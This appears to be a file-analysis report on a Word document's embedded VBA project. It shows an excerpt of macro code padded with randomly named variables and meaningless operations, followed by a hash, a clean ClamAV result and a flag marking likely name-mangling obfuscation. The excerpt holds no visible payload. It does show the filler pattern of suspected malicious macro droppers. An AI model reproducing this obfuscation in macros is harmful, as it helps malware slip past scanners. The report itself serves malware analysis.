kEbLvCjbr = Right(186829, 2)
zGmoD = Left(1716941, 4)
LXvRKEfTW = Space(1)
KhiQaip = Left(4707359, 2)
WgqfTITOHxn = Space(18)
jaYzEsLT = 99 - 95 - 13
jaYzEsLT = UCase(5106028922#)
QoJHB = StrReverse(86198917)
bIBcHTLDIwb = Left(846745851577#, 3)
sBqPr = StrReverse(374341045695168#)
ksEESrvQ = LTrim(24250)
mKUrwC = "VDVjxYSdyIuBhXdD"
End Function
Function fYJGUC(VlpOZb As String, ZjSYwOl As Boolean, CFNtwsg As Double, QNEJDdZ As String) As String
ksEESrvQ = StrReverse(398505989327622#)
QoJHB = Space(20)
KMFjiVDKrZ = Space(9)
qwHslJuRI = RTrim(9544979203855#)
ksEESrvQ = UCase(911525055969730#)
NMBjfWDGCD = RTrim(7980811883264#)
YpNSadIIwrU = UCase(328579)
BWPjymYu = Right(855887, 2)
sAiYhISSkXX = RTrim(689184)
QoJHB = 45 - 43 - 98 - 75 - 74 - 21
BQwPso = 45 - 7 - 0 - 97
Rrqksfcb = 73 - 63 - 53 - 46
For otNRQU = 0 To 5
zGmoD = Right(2056912958030#, 3)
zHufIggwI = Right(994423564000432#, 5)
Rrqksfcb = RTrim(5483688)
Next otNRQU
KhiQaip = RTrim(190602815)
BWPjymYu = LTrim(77672044)
BWPjymYu = 51 + 89 + 26 + 98
ksEESrvQ = LTrim(88243)
QoJHB = StrReverse(994604406)
ksEESrvQ = StrReverse(923353)
fYJGUC = "GOcPLNYPIFnfAypbPvId"
End Function
Attribute VB_Name = "Module12"
Function LcsOBd(oiKVXD As String, sjwrOyl As String, RGRueow As Double) As String
BWPjymYu = Left(2501172331092#, 3)
UvMzrbZJsmA = StrReverse(45838772752#)
LEBseY = LTrim(42212)
kEbLvCjbr = UCase(549519490169#)
zGmoD = Left(253323, 4)
YpNSadIIwrU = 40 - 49 - 100 - 53 - 21
BQwPso = Right(474643, 5)
sAiYhISSkXX = UCase(756443222)
lFeAHsjz = 44 - 78
zHufIggwI = RTrim(43004515)
QoJHB = LTrim(77384)
KhiQaip = RTrim(73894539519#)
qwHslJuRI = Right(514516470, 5)
KhiQaip = Left(5631748409#, 3)
DwnpOKVNxQST = StrReverse(297108055303#)
bIBcHTLDIwb = LTrim(146939293383278#)
QoJHB = Right(61854, 3)
lqWjUyQs = Space(5)
KMFjiVDKrZ = RTrim(6865189208219#)
bIBcHTLDIwb = RTrim(4423259060#)
LcsOBd = "feugYPaTocAaGfukUtoi"
End Function
Sub wzqGKQ(CgqEXHX As Boolean, wXiqGfZ As Double)
WgqfTITOHxn = Space(8)
lqWjUyQs = Left(6177316665#, 3)
UvMzrbZJsmA = UCase(9059117)
tkbyI = Left(91868127, 5)
kEbLvCjbr = LTrim(988070)
KMFjiVDKrZ = UCase(93145418)
QhYkIS = StrReverse(1207476604)
KMFjiVDKrZ = 49 + 62 + 21
NMBjfWDGCD = Left(65282769121623#, 5)
BWPjymYu = LTrim(660779)
UvMzrbZJsmA = Space(16)
LEBseY = Left(5868514933#, 4)
zHufIggwI = StrReverse(426267335)
bIBcHTLDIwb = UCase(4663709434287#)
LEBseY = StrReverse(521826)
End Sub
Function TmvfOt(KvCIoI As String, PzYwNjT As Boolean, PvqBoO As Double) As String
For cOysrk = 0 To 4
While uBWZSZ < 1
zHufIggwI = LTrim(84557324000395#)
tkbyI = Left(819596242, 5)
KaQXTWKZpoJb = StrReverse(9402)
ksEESrvQ = UCase(27859174528#)
uBWZSZ = uBWZSZ + 1
Wend
KMFjiVDKrZ = RTrim(41267804316503#)
BQwPso = 71 - 34 - 36 - 1 - 96
YpNSadIIwrU = Space(3)
BQwPso = UCase(79156001156219#)
YpNSadIIwrU = Right(78232222, 3)
Next cOysrk
KMFjiVDKrZ = LTrim(96489)
KaQXTWKZpoJb = 77 - 33
LEBseY = RTrim(2082647935746#)
lqWjUyQs = UCase(778943710)
zGmoD = LTrim(76373)
LEBseY = RTrim(888410)
…
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 274432 bytes |
SHA-256: 888d05f31cf646655b3299788a07dc39996085db6e71594ad8df962728dbffd6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
994 of 1801 identifiers look randomly generated (e.g. 'JtfVnTxWEVKUSlBYNGyu') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.